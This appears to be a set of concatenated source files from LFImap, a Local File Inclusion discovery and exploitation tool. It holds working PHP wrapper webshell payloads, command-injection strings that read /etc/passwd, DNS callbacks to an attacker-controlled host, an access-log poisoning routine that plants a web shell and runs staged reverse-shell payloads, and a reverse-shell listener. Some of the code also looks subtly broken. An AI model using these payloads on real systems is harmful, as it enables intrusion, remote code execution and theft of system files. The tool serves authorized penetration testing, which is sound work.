            + post.replace(args['param'], "php://input")
        )
        posts.append(
            "<?php echo(system('cat /etc/passwd'));?>/*&"
            + post.replace(args['param'], "php://input")
        )
    else:
        tests.append("php%3a%2f%2finput&cmd=cat%20%2Fetc%2Fpasswd")
        tests.append("php%3a%2f%2finput&cmd=ipconfig")

        posts.append("<?php echo(shell_exec($_GET['cmd']));?>")
        posts.append("<?php echo(exec($_GET['cmd']));?>")
        posts.append("<?php echo(passthru($_GET['cmd']));?>")
        posts.append("<?php echo(system($_GET['cmd']));?>")

    if args['is_tested_param_post']:
        for i, p in enumerate(posts):
            u, reqHeaders, postTest = prepareRequest(args['param'], "", url, p)
            _, br = REQUEST(u, reqHeaders, postTest, proxies, "RCE", "INPUT")
            if not br:
                return
            if i == 1 and args['quick']:
                return
        return

    for _, test in enumerate(tests):
        u, reqHeaders, _ = prepareRequest(args['param'], test, url, post)
        for j, post in enumerate(posts):
            _, br = REQUEST(u, reqHeaders, post, proxies, "RCE", "INPUT")

            if not br:
                return

            if j == 1 and args['quick']:
                return

    return



"""test_rfi_exploit"""
import time
import os
import threading
from http.server import ThreadingHTTPServer, SimpleHTTPRequestHandler
import base64
import urllib.parse
import urllib3.util

import requests
import pytest
import src.attacks.cmdi
from src.utils.stats import stats, init_stats
import src.utils.arguments
import src.attacks.rfi

# Event that shuts down the server when we are done with it
shut_down_http_server = threading.Event()


class CustomHTTPRequestHandler(SimpleHTTPRequestHandler):
    """CustomHTTPReq`uestHandler"""

    request_response_markers = []

    def do_GET(self) -> None:
        """do_GET"""
        if self.request_response_markers is None:
            print("WARNING: NO markers have been set")
            self.send_response(200)
            self.end_headers()

        if self.path.startswith("/vulnerabilities") or self.path == "/":
            uri = urllib3.util.parse_url(self.path)
            response = b""
            if uri.query is not None:
                params = urllib.parse.parse_qs(uri.query)
                if "name" in params:
                    # Check if it is one of our markers
                    values = params["name"]
                    found = False
                    for value in values:
                        value = urllib.parse.unquote(value)

                        for request_response_marker in self.request_response_markers:
                            for value in request_response_marker["find"]:
                                response = request_response_marker["respond"]
                                found = True
                                break

                            if found:
                                break

                        if found:
                            break

            self.send_response(200)
            self.end_headers()
            self.wfile.write(response)
        else:
            self.send_response(404)
            self.end_headers()


def dummy_http_server(request_response_markers):
    """Dummy HTTP Server for testing"""
    server_address = ("127.0.0.1", 8080)
    http_handler = CustomHTTPRequestHandler
    http_handler.request_response_markers = request_response_markers

    # Prevent the HTTP Server from logging the requests into the stdout
    http_handler.log_message = lambda *args, **kwargs: None
    httpd = ThreadingHTTPServer(server_address, http_handler)

    while not shut_down_http_server.is_set():
        httpd.handle_request()


def custom_init_args():
    """Custom Init of the Args"""
    src.utils.arguments.args = {
        "url": ["http://127.0.0.1:8080/vulnerabilities/fi/?page=PWN"],
        "f": None,
        "reqfile": None,
        "cookie": "",
        "postreq": False,
        "httpheaders": {
            "User-Agent": "Mozilla/3.01 (Macintosh; PPC)",
            "Accept": "*/*",
            "Connection": "Close",
        },
        "method": "GET",
        "proxyAddr": None,
        "agent": None,
        "referer": None,
        "param": "PWN",
        "delay": None,
        "maxTimeout": None,
        "http_valid": [200, 204, 301, 302, 303],
        "csrfParameter": None,
        "csrfMethod": None,
        "csrfUrl": None,
        "csrfData": None,
        "secondMethod": None,
        "checkUrl": None,
        "secondData": None,
        "force_ssl": False,
        "no_stop": True,
        "php_filter": False,
        "php_input": False,
        "php_data": False,
        "php_expect": False,
        "trunc": False,
        "rfi": False,
        "cmd": False,
        "file": False,
        "heuristics": False,
        "test_all": True,
        "encodings": None,
        "quick": False,
        "revshell": False,
        "lhost": None,
        "lport": None,
        "callback": None,
        "log": None,
        "verbose": True,
        "updateCsrfToken": False,
        "no_colors": False,
    }

    script_directory = os.path.dirname(
        __file__ + os.sep + ".." + os.sep + ".." + os.sep + ".." + os.sep
    )
    script_directory = os.path.abspath(script_directory)
    src.utils.arguments.args["script_directory"] = script_directory

    src.utils.arguments.args[
        "truncWordlist"
    ] = f"{src.utils.arguments.args['script_directory']}/src/wordlists/short.txt"


def start_web_server(request_response_markers=None):
    """Start HTTP Server"""
    shut_down_http_server.clear()
    thread = threading.Thread(target=dummy_http_server, args=[request_response_markers])
    thread.start()

    time.sleep(0.5)


def stop_web_server():
    """Stop web server"""
    shut_down_http_server.set()
    # Trigger another handle_request, so that the loop exits

    try:
        requests.get("http://127.0.0.1:8080/", timeout=1)
    except:
        pass


def test_test_rfi():
    """Test the test_rfi interface"""

    start_web_server(
        [
            {
                "find": [
                    "/ysvznc.php",
                    "/ysvznc.jsp",
                    "/ysvznc.html",
                    "/ysvznc.gif",
                    "/ysvznc.png",
                ],
                "respond": base64.b64decode(
                    "OTYxYmIwOGE5NWRiYzM0Mzk3MjQ4ZDkyMzUyZGE3OTk="
                ),
            }
        ],
    )
    custom_init_args()
    init_stats()

    src.attacks.rfi.test_rfi("http://127.0.0.1:8080/vulnerabilities/?name=PWN", "")

    stop_web_server()

    if stats["requests"] != 5:
        msg = f"We are expecting 5 'requests', got: {stats['requests']}"
        pytest.fail(msg)

    if stats["vulns"] != 5:
        msg = f"We are expecting 5 'vulns', got: {stats['vulns']}"
        pytest.fail(msg)

    print(f"{stats=}")


def test_test_cmd_injection():
    """Test the test_cmd_injection interface"""

    start_web_server(
        [
            {"find": ["cat${IFS}/etc/passwd"], "respond": b"root:x:0:0"},
            {"find": ["1&ipconfig /all&"], "respond": b"Windows IP Configuration"},
        ]
    )
    custom_init_args()
    init_stats()

    src.attacks.cmdi.test_cmd_injection(
        "http://127.0.0.1:8080/vulnerabilities/fi/?name=PWN", ""
    )

    stop_web_server()

    if stats["requests"] != 2:
        msg = f"We are expecting 2 'requests', got: {stats['requests']}"
        pytest.fail(msg)

    if stats["vulns"] != 2:
        msg = f"We are expecting 2 'vulns', got: {stats['vulns']}"
        pytest.fail(msg)

    print(f"{stats=}")



"""Trunc"""
from src.utils.arguments import init_args
from src.httpreqs.request import prepareRequest
from src.httpreqs.request import REQUEST
from src.configs.config import proxies
from src.utils.colors import Colors


def test_trunc(url, post):
    """Test Trunc"""
    args  = init_args()
    if args['verbose']:
        print(
            Colors().blue("[i]")
            + " Testing path truncation using '"
            + args['truncWordlist']
            + "' wordlist...", flush = True
        )

    i = 0

    with open(args['truncWordlist'], "r", encoding="utf-8") as f:
        for line in f:
            line = line.strip()
            u, reqHeaders, postTest = prepareRequest(args['param'], line, url, post)
            # Because of some unicode tests that we do, (wide N for nodejs apps..)
            if postTest:
                postTest = postTest.encode("utf-8")

            _, br = REQUEST(u, reqHeaders, postTest, proxies, "LFI", "TRUNC")

            if not br:
                return

            if i == 1 and args['quick']:
                return

            i += 1

    return



"""Test Data"""
import urllib.parse as urlparse
from urllib.parse import urlparse, parse_qs

from src.utils.arguments import init_args
from src.configs import config
from src.utils.encodings import encode
from src.httpreqs.request import prepareRequest
from src.httpreqs.request import REQUEST
from src.utils.colors import Colors


def test_data(url, post):
    """Test Data"""
    args  = init_args()
    if args['verbose']:
        print(Colors().blue("[i]") + " Testing with data wrapper...", flush = True)

    tests = []

    # Testing the URL parameter, payload and then &cmd is added
    if args['param'] in url:
        tests.append(
            "data%3A%2F%2Ftext%2Fplain%3Bbase64%2CPD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4K&c=cat%20%2Fetc%2Fpasswd"
        )
        tests.append(
            "data%3A%2F%2Ftext%2Fplain%3Bbase64%2CPD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4K&c=ipconfig"
        )

        for _, test in enumerate(tests):
            u, reqHeaders, postTest = prepareRequest(args['param'], test, url, post)
            _, br = REQUEST(u, reqHeaders, postTest, config.proxies, "RCE", "DATA")

            if not br:
                return
            
        return

    urls = []

    # Logic to see if another URL parameter exists
    # based on that append ?/& and exploit code
    if len(parse_qs(urlparse(url).query)) == 0:
        urls.append("?c=cat%20%2Fetc%2Fpasswd")
        urls.append("?c=ipconfig")
    else:
        urls.append("&c=cat%20%2Fetc%2Fpasswd")
        urls.append("&c=ipconfig")

    test = (
        "data%3A%2F%2Ftext%2Fplain%3Bbase64%2CPD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4K"
    )

    for _, url_item in enumerate(urls):
        url, reqHeaders, postTest = prepareRequest(args['param'], test, url, post)
        _, br = REQUEST(
            url + encode(url_item),
            reqHeaders,
            postTest,
            config.proxies,
            "RCE",
            "DATA",
        )
        if not br:
            break

    return



from setuptools import setup, find_packages

setup(
    name='lfimap',
    version='0.1.4',
    packages=find_packages(include=['lfimap', 'lfimap.*']),
    package_dir={
        'lfimap': 'lfimap',
    },
    package_data={
        'lfimap': ['src/**/*'],
    },
    include_package_data=True,
    install_requires=[
        'argparse',
        'bs4',
        'pybase64',
        'requests',
        'urllib3'
    ],
    entry_points={
        'console_scripts': [
            'lfimap = lfimap.lfimap:main',
        ],
    },
    author='@h4nsmach1ne',
    author_email='therealpowa@gmail.com',
    description='Local File Inclusion discovery and exploitation tool',
    long_description=open('README.md').read(),
    long_description_content_type='text/markdown',
    url='https://github.com/hansmach1ne/LFImap',
    license='Apache',
    classifiers=[
        'Programming Language :: Python :: 3',
        'License :: OSI Approved :: Apache Software License',
        'Operating System :: OS Independent',
    ],
)



"""Command Injection"""
import string
import random

from src.httpreqs.request import REQUEST
from src.httpreqs.request import prepareRequest
from src.configs.config import proxies
from src.utils.arguments import init_args
from src.utils.colors import Colors

def is_value_in_dict(dictionary, target_value):
    """
    Returns True if value is found inside the dict
    
    Return boolean.
    """
    for key, value in dictionary.items():
        if key == target_value or value == target_value:
            return True

    return False


def get_key_for_value(dictionary, target_value):
    """
    Get key from a given value
    Return either the key or empty (str)
    """
    for key, value in dictionary.items():
        if key == target_value or value == target_value:
            return key

    return ""


def generate_random_alphanumeric():
    """Generate 5 length random alphanumeric string"""
    alphanumeric_chars = string.ascii_letters + string.digits
    return "".join(random.choices(alphanumeric_chars, k=5))


def test_cmd_injection(url, post):
    """Test CMD Injection"""
    args  = init_args()
    if args['verbose']:
        print(Colors().blue("[i]") + " Testing results-based OS command injection...",
                flush = True)

    cmdList = []
    cmdList.append(
        "1%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd%3B%23%24%7BIFS%7D%27%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd%3B%23%24%7BIFS%7D%5C%22%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd%3B%23%24%7BIFS%7D"
    )
    cmdList.append(
        "1%26ipconfig%20%2Fall%26%60ipconfig%20%2Fall%60%26%5C%221%26ipconfig%20%2Fall%26%60ipconfig%20%2Fall%60%26"
    )

    randomVal = []
    # Generate 7 random dns subdomains
    for _ in range(7):
        randomVal.append(generate_random_alphanumeric())

    if args['callback']:
        cmdList.append(
            "1;nslookup${IFS}"
            + randomVal[0]
            + "."
            + args['callback']
            + ";%23${IFS}';nslookup${IFS}"
            + randomVal[1]
            + "."
            + args['callback']
            + ';%23${IFS}";nslookup${IFS}'
            + randomVal[2]
            + "."
            + args['callback']
            + ";%23${IFS}"
        )
        cmdList.append(
            "1%26nslookup "
            + randomVal[3]
            + "."
            + args['callback']
            + "%26`nslookup "
            + randomVal[4]
            + "."
            + args['callback']
            + '`%26"1%26nslookup '
            + randomVal[5]
            + "."
            + args['callback']
            + "%26`nslookup "
            + randomVal[6]
            + "."
            + args['callback']
            + "`%26"
        )

    nslookupFlag = False
    for _, cmd in enumerate(cmdList):
        u, reqHeaders, postTest = prepareRequest(args['param'], cmd, url, post)

        if "nslookup" in cmd and args['verbose'] and not nslookupFlag:
            nslookupFlag = True
            if args['verbose']:
                print(
                    Colors().blue("[i]")
                    + " Trying to provoke an external callback to '"
                    + args['callback']
                    + "'. Check your listener logs...",
                    flush = True
                )

        _, br = REQUEST(u, reqHeaders, postTest, proxies, "RCE", "CMD")

        if not br or args['quick']:
            return



import argparse


# Custom HelpFormatter
class BannerHelpFormatter(argparse.HelpFormatter):
    def __init__(self, prog):
        super().__init__(prog, max_help_position=30, width=100)

    def format_help(self):
        # Get the default help message
        help_text = super().format_help()

        # Define a banner message
        banner = """
  _      ______ _____                       
 | |    |  ____|_   _|                      
 | |    | |__    | |  _ __ ___   __ _ _ __  
 | |    |  __|   | | | '_ ` _ \ / _` | '_ \ 
 | |____| |     _| |_| | | | | | (_| | |_) |
 |______|_|    |_____|_| |_| |_|\__,_| .__/ 
                                     | |    
                                     |_|    

                                - by @h4nsmach1ne\n\n\n"""

        # Add the banner to the help message
        return banner + help_text



checkedHosts = []
exploits = []
proxies = {}
rfi_test_port = 8000
tOut = None
initialReqTime = 0
scriptName = ""
tempArg = ""
webDir = ""
skipsqli = False
previousPrint = ""
urls = []
parsedUrls = []
maxTimeout = None
csrf_params = [
    "csrf",
    "xsrf",
    "csrfmiddlewaretoken",
    "RequestVerificationToken",
    "_RequestVerificationToken",
    "antiForgeryToken",
    "authenticity_token",
    "csrf_token",
    "_csrf",
    "_xsrf",
    "_csrf_token",
    "_xsrf_token",
]

# Add them from the most complex one to the least complex. This is important.
TO_REPLACE = [
    "Windows/System32/drivers/etc/hosts",
    "C%3A%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts",
    "file://C:\Windows\System32\drivers\etc\hosts",
    "%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts",
    "C:\Windows\System32\drivers\etc\hosts",
    "Windows\\System32\\drivers\\etc\\hosts",
    "%windir%\System32\drivers\etc\hosts",
    "file%3A%2F%2F%2Fetc%2Fpasswd%2500",
    "file%3A%2F%2F%2Fetc%2Fpasswd",
    "cat%24%7BIFS%7D%2Fetc%2Fpasswd",
    "cat%24IFS%2Fetc%2Fpasswd",
    "cat${IFS%??}/etc/passwd",
    "/sbin/cat%20/etc/passwd",
    "/sbin/cat /etc/passwd",
    "cat%20%2Fetc%2Fpasswd",
    "cat${IFS}/etc/passwd",
    "cat /etc/passwd",
    "%2Fetc%2Fpasswd",
    "/etc/passwd",
    "ysvznc",
    "ipconfig",
]

KEY_WORDS = [
    "root:x:0:0",
    "<IMG sRC=X onerror=jaVaScRipT:alert`xss`>",
    "<img src=x onerror=javascript:alert`xss`>",
    "cm9vdDp4OjA",
    "Ond3dy1kYX",
    "ebbg:k:0:0",
    "d3d3LWRhdG",
    'aahgpz"ptz>e<atzf',
    "jjj-qngn:k",
    "daemon:x:1:",
    "r o o t : x : 0 : 0",
    "ZGFlbW9uOng6",
    "; for 16-bit app support",
    "sample HOSTS file used by Microsoft",
    "iBvIG8gdCA6IHggOiA",
    "OyBmb3IgMTYtYml0IGFwcCBzdXBw",
    "c2FtcGxlIEhPU1RTIGZpbGUgIHVzZWQgYnkgTWljcm9zb2",
    "Windows IP Configuration",
    "OyBmb3IgMT",
    "; sbe 16-ovg ncc fhccbeg",
    "; sbe 16-ovg ncc fhccbeg",
    "fnzcyr UBFGF svyr hfrq ol Zvpebfbsg",
    ";  f o r  1 6 - b i t  a p p",
    "fnzcyr UBFGF svyr hfrq ol Zvpebfbsg",
    "c2FtcGxlIEhPU1RT",
    "=1943785348b45",
    "www-data:x",
    "PD9w",
    "961bb08a95dbc34397248d92352da799",
    "PCFET0NUWVBFIGh0b",
    "PCFET0N",
    "PGh0b",
]



"""Filter"""
import os
import urllib.parse as urlparse
from src.utils.arguments import init_args
from src.configs.config import proxies
from src.httpreqs.request import prepareRequest
from src.httpreqs.request import REQUEST
from src.utils.colors import Colors


def test_filter(url, post):
    """Test Filter"""
    args  = init_args()
    if args['verbose']:
        print(Colors().blue("[i]") + " Testing with filter wrapper...", flush = True)

    tests = []
    tests.append("php%3A%2F%2Ffilter%2Fresource%3D%2Fetc%2Fpasswd")
    tests.append(
        "php%3A%2F%2Ffilter%2Fresource%3D..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts"
    )

    tests.append("php%3A%2F%2Ffilter%2Fresource%3D%2Fetc%2Fpasswd%2500")
    tests.append(
        "php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3D%2Fetc%2Fpasswd"
    )
    tests.append(
        "php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3D%2Fetc%2Fpasswd%2500"
    )
    tests.append(
        "php%3A%2F%2Ffilter%2Fresource%3D..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts%2500"
    )
    tests.append(
        "php%3A%2F%2Ffilter%2Fresource%3DC%3A%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts"
    )
    tests.append(
        "php%3A%2F%2Ffilter%2Fresource%3DC%3A%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts%2500"
    )

    script = os.path.splitext(os.path.basename(urlparse.urlsplit(url).path))
    scriptName = script[0]
    # If '/?=' in url
    if scriptName == "":
        scriptName = "index"

    tests.append(
        "php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3D" + scriptName
    )
    tests.append(
        "php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3D" + scriptName + ".php"
    )
    tests.append(
        "php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3D"
        + scriptName
        + "%2500"
    )

    for i, test in enumerate(tests):
        u, reqHeaders, postTest = prepareRequest(args['param'], test, url, post)
        _, br = REQUEST(u, reqHeaders, postTest, proxies, "LFI", "FILTER")

        if not br:
            return

        if i == 1 and args['quick']:
            return

    return



"""httpHeaders"""
import random
from src.utils.arguments import init_args


def addHeader(headers, newKey, newVal):
    """"Add a header to the dict"""
    headers[newKey] = newVal
    return headers


def delHeader(headers, key):
    """Remove header from the dict"""
    headers.pop(key)
    return headers


def initHttpHeaders():
    """Init the header dict"""
    args  = init_args()
    headers = {}
    user_agents = [
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.3",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.1",
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.",
        "Mozilla/5.0 (X11; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0",
        "Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01",
        "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/25.0 Chrome/121.0.0.0 Safari/537.3",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.153.1 Safari/525.19",
    ]

    if args['agent']:
        headers["User-Agent"] = args['agent']
    else:
        headers["User-Agent"] = random.choice(user_agents)
    if args['referer']:
        headers["Referer"] = args['referer']

    headers["Accept"] = "*/*"
    headers["Connection"] = "Close"

    return headers



"""Log Poison"""
import os
import threading

from src.utils.arguments import init_args
from src.httpreqs import request
from src.configs import config
from src.utils.colors import Colors
from src.utils.info import printFancyString
from src.utils.info import printInfo
from src.servers.LFIshell import start_listener

def exploit_log_poison(
    ip, port, url, payloadStageOne, payloadStageTwo, testPayload, testString, post
):
    args  = init_args()
    if args['f']:
        return

    maliciousHeaders = args['httpheaders'].copy()
    maliciousHeaders["User-Agent"] = "<?php system($_GET['c']); ?>"
    lastPrintedStringLen = 0

    if not os.path.exists(
        args['scriptDirectory'] + os.sep + "src/wordlists/http_access_log.txt"
    ):
        print(
            Colors().red("[-]")
            + " Cannot locate '"
            + args['scriptDirectory']
            + os.sep
            + "src/wordlists/http_access_log.txt"
            + "' file that contains log locations",
            flush = True
        )
        return

    with open(args['scriptDirectory'] + os.sep + "src/wordlists/http_access_log.txt", "r", encoding="latin1") as f:
        print(
            Colors().green("[i]")
            + " Enumerating file system to discover access log location...", flush = True
        )
        lines = f.readlines()
        for line in lines:
            line = line.strip()

            lastPrintedStringLen = printFancyString(
                "Checking: " + line, lastPrintedStringLen
            )

            if post:
                res, _ = request.REQUEST(
                    url,
                    args['httpheaders'],
                    post.replace(config.tempArg, line),
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )
            else:
                res, _ = request.REQUEST(
                    url.replace(config.tempArg, line),
                    args['httpheaders'],
                    post,
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )

            if args['httpheaders']["User-Agent"] in res.text:
                lastPrintedStringLen = printFancyString("", lastPrintedStringLen)
                print(
                    "\n"
                    + Colors().green("[.]")
                    + " Located canary in target's access log at '"
                    + line
                    + "'",
                    flush = True
                )

                print(
                    Colors().green("[.]")
                    + " Poisoning access log with the shell code... ",
                    flush = True
                )

                # First start the reverse listener
                thread = threading.Thread(target=start_listener, args=(args.lport,))
                thread.start()

                # Upload web shell inside log
                if post:
                    request.REQUEST(
                        url,
                        maliciousHeaders,
                        post.replace(config.tempArg, line),
                        config.proxies,
                        "",
                        "",
                        exploit=True,
                    )
                else:
                    res, _ = request.REQUEST(
                        url.replace(config.tempArg, line),
                        maliciousHeaders,
                        post,
                        config.proxies,
                        "",
                        "",
                        exploit=True,
                    )

                # Exploit to RCE
                if config.tempArg in url:
                    if "?" in url:
                        # Append ampersand as the Nth  parameter value
                        exploitUrl = (
                            url.replace(config.tempArg, line) + "&c=" + testPayload
                        )
                    else:
                        # Append questionmark as first parameter value
                        exploitUrl = (
                            url.replace(config.tempArg, line) + "?c=" + testPayload
                        )

                    res, _ = request.REQUEST(
                    exploitUrl,
                    args.httpheaders,
                    post,
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )

                elif config.tempArg in post:
                    exploitPost = post + "&c=" + payloadStageOne

                    res, _ = request.REQUEST(
                    exploitUrl,
                    args['httpheaders'],
                    post,
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )

                if testString in res.text:
                    printInfo(ip, port, "bash", "access log poisoning")

                    if config.tempArg in post:
                        print(
                            Colors().green("[.]")
                            + " Executing stage 1 of the revshell payload...",
                            flush = True
                        )
                        request.REQUEST(
                            url,
                            args['httpheaders'],
                            exploitPost,
                            config.proxies,
                            "",
                            "",
                            exploit=True,
                        )

                        if payloadStageTwo != "":
                            print(
                                Colors().green("[.]")
                                + " Executing stage 2 of the revshell payload...",
                                flush = True
                            )
                            request.REQUEST(
                                url,
                                exploitPost,
                                args['httpheaders'],
                                config.proxies,
                                "",
                                "",
                                exploit=True,
                            )
                            exploitPost = url + "&c=" + payloadStageTwo
                        break

                    elif config.tempArg in url:
                        exploitUrl = (
                            url.replace(config.tempArg, line) + "&c=" + payloadStageOne
                        )
                        print(
                            Colors().green("[.]")
                            + " Executing stage 1 of the revshell payload...",
                            flush = True
                        )
                        request.REQUEST(
                            exploitUrl,
                            args['httpheaders'],
                            post,
                            config.proxies,
                            "",
                            "",
                            exploit=True,
                        )

                        if payloadStageTwo != "":
                            exploitUrl = (
                                url.replace(config.tempArg, line)
                                + "&c="
                                + payloadStageTwo
                            )
                            print(
                                Colors().green("[.]")
                                + " Executing stage 2 of the revshell payload. Check your listener...",
                                flush = True
                            )
                            request.REQUEST(
                                exploitUrl,
                                args['httpheaders'],
                                post,
                                config.proxies,
                                "",
                                "",
                                exploit=True,
                            )
                        
                        # Join the listener thread, with 10 second timeout in case deadlock, unexpected expections or other errors occur in the meantime
                        # This will make sure that execution continues no matter the occurring issues in the thread
                        thread.join(timeout=10)
                        break
        else:
            # lastPrintedStringLen = printFancyString("", lastPrintedStringLen)
            if args['verbose']:
                printFancyString(
                    Colors().red("[-]")
                    + " Couldn't locate target server's access log to poison/log is not readable.\n",
                    lastPrintedStringLen,
                )
            else:
                printFancyString("", lastPrintedStringLen)



"""LFI Shell"""
import sys
import socket
from src.utils.colors import Colors


def start_listener(listen_port):
    """Start a listener to catch the reverse shell and handle commands"""
    try:
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.bind(("0.0.0.0", listen_port))
        listener.listen(1)
        print(
            Colors().purple("[*]")
            + f" Starting reverse listener on 0.0.0.0:{listen_port}",
            flush = True
        )
        client_socket, client_address = listener.accept()

        print(
            Colors().red("\n[*]") + f" Connection received from {client_address}",
            flush = True
        )
        print(
            Colors().red("[*]")
            + " Press enter to spawn the shell. Type 'back' to continue or 'quit' to terminate LFImap.\n",
            flush = True
        )

        # Set a timeout for the socket
        client_socket.settimeout(2.0)

        while True:
            # Flush initial output
            response = b""
            while True:
                try:
                    data = client_socket.recv(4096)
                    response += data
                    if len(data) < 4096:
                        break
                except socket.timeout:
                    break
            print(response.decode(), end="", flush = True)

            command = input("")
            if command.lower() in ["back"]:
                client_socket.close()
                break
            if command.lower() in ["quit"]:
                sys.exit(0)

            # Send command with newline character
            client_socket.sendall((command + "\n").encode())

            # Receive the response
            response = b""
            while True:
                try:
                    data = client_socket.recv(4096)
                    response += data
                    if len(data) < 4096:
                        break
                except socket.timeout:
                    break
            if response:
                print(response.decode(), end="", flush = True)
    except OSError:
        # Addr already in use
        # This is expected if multiple RCEs are avilable and user tries to spawn the shell
        pass
    except Exception as e:
        print(f"Error: {e}", flush = True)
    finally:
        listener.close()



"""Arguments"""
import sys
import argparse
from src.utils.banner import BannerHelpFormatter

sys.stdout.flush()

args = None

def init_args() -> dict:
    """
    Initialize the arguments used by the program
    """
    global args

    if args is not None:
        return args

    parser = argparse.ArgumentParser(
        description="LFImap, Local File Inclusion discovery and exploitation tool",
        formatter_class=BannerHelpFormatter,
        add_help=False,
    )

    mandatoryGroup = parser.add_argument_group("TARGET OPTIONS")
    mandatoryGroup.add_argument(
        "-U",
        type=str,
        nargs="?",
        metavar="url",
        dest="url",
        help="\t\t Single url to test",
    )
    mandatoryGroup.add_argument(
        "-F",
        type=str,
        nargs="?",
        metavar="urlfile",
        dest="f",
        help="\t\t Load multiple urls to test from a file",
    )
    mandatoryGroup.add_argument(
        "-R",
        type=str,
        nargs="?",
        metavar="reqfile",
        dest="reqfile",
        help="\t\t Load single request to test from a file",
    )

    optionsGroup = parser.add_argument_group("REQUEST OPTIONS")
    optionsGroup.add_argument(
        "-C",
        type=str,
        metavar="<cookie>",
        dest="cookie",
        help="\t\t HTTP session Cookie header",
    )
    optionsGroup.add_argument(
        "-D",
        type=str,
        metavar="<data>",
        dest="postreq",
        help="\t\t HTTP request FORM-data",
    )

    # optionsGroup.add_argument(
    #     "-J",
    #     type=str,
    #     metavar="<json>",
    #     dest="json",
    #     help="\t\t Specify request JSON FORM-data",
    # )

    optionsGroup.add_argument(
        "-H",
        type=str,
        metavar="<header>",
        action="append",
        dest="httpheaders",
        help="\t\t Additional HTTP header(s)",
    )
    optionsGroup.add_argument(
        "-M",
        type=str,
        metavar="<method>",
        dest="method",
        help="\t\t Request method to use for testing",
    )
    optionsGroup.add_argument(
        "-P",
        type=str,
        metavar="<proxy>",
        dest="proxyAddr",
        help="\t\t Use a proxy to connect to the target endpoint",
    )
    optionsGroup.add_argument(
        "--useragent",
        type=str,
        metavar="<agent>",
        dest="agent",
        help="\t\t HTTP user-agent header value",
    )
    optionsGroup.add_argument(
        "--referer",
        type=str,
        metavar="<referer>",
        dest="referer",
        help="\t\t HTTP referer header value",
    )
    optionsGroup.add_argument(
        "--placeholder",
        type=str,
        metavar="<name>",
        dest="param",
        help='\t\t Custom testing placeholder name (default is "PWN")',
    )
    optionsGroup.add_argument(
        "--delay",
        type=int,
        metavar="<milis>",
        dest="delay",
        help="\t\t Delay in miliseconds after each request",
    )
    optionsGroup.add_argument(
        "--max-timeout",
        type=int,
        metavar="<seconds>",
        dest="maxTimeout",
        help="\t\t Number of seconds after giving up on a response (default 5)",
    )
    optionsGroup.add_argument(
        "--http-ok",
        type=int,
        action="append",
        metavar="<number>",
        dest="http_valid",
        help="\t\t Http response code(s) to treat as valid",
    )
    optionsGroup.add_argument(
        "--csrf-param",
        type=str,
        metavar="<param>",
        dest="csrfParameter",
        help="\t\t Parameter used to hold anti-CSRF token",
    )
    optionsGroup.add_argument(
        "--csrf-method",
        type=str,
        metavar="<method>",
        dest="csrfMethod",
        help="\t\t HTTP method to use during anti-CSRF token page visit",
    )
    optionsGroup.add_argument(
        "--csrf-url",
        type=str,
        metavar="<url>",
        dest="csrfUrl",
        help="\t\t URL address to visit for extraction of anti-CSRF token",
    )
    optionsGroup.add_argument(
        "--csrf-data",
        type=str,
        metavar="<data>",
        dest="csrfData",
        help="\t\t POST data to send during anti-CSRF token page visit",
    )
    optionsGroup.add_argument(
        "--second-method",
        type=str,
        metavar="<method>",
        dest="secondMethod",
        help="\t\t Specify method for second order request",
    )
    optionsGroup.add_argument(
        "--second-url",
        type=str,
        metavar="<url>",
        dest="checkUrl",
        help="\t\t Url for second order request",
    )
    optionsGroup.add_argument(
        "--second-data",
        type=str,
        metavar="<data>",
        dest="secondData",
        help="\t\t FORM-line data for second-order request",
    )
    optionsGroup.add_argument(
        "--force-ssl",
        action="store_true",
        dest="force_ssl",
        help="\t\t Force usage of HTTPS/SSL if otherwise not specified",
    )
    optionsGroup.add_argument(
        "--no-stop",
        action="store_true",
        dest="no_stop",
        help="\t\t Don't stop using the same testing technique upon findings",
    )

    attackGroup = parser.add_argument_group("ATTACK TECHNIQUE")
    attackGroup.add_argument(
        "-f",
        "--filter",
        action="store_true",
        dest="php_filter",
        help="\t\t Attack using filter wrapper",
    )
    attackGroup.add_argument(
        "-i",
        "--input",
        action="store_true",
        dest="php_input",
        help="\t\t Attack using input wrapper",
    )
    attackGroup.add_argument(
        "-d",
        "--data",
        action="store_true",
        dest="php_data",
        help="\t\t Attack using data wrapper",
    )
    attackGroup.add_argument(
        "-e",
        "--expect",
        action="store_true",
        dest="php_expect",
        help="\t\t Attack using expect wrapper",
    )
    attackGroup.add_argument(
        "-t",
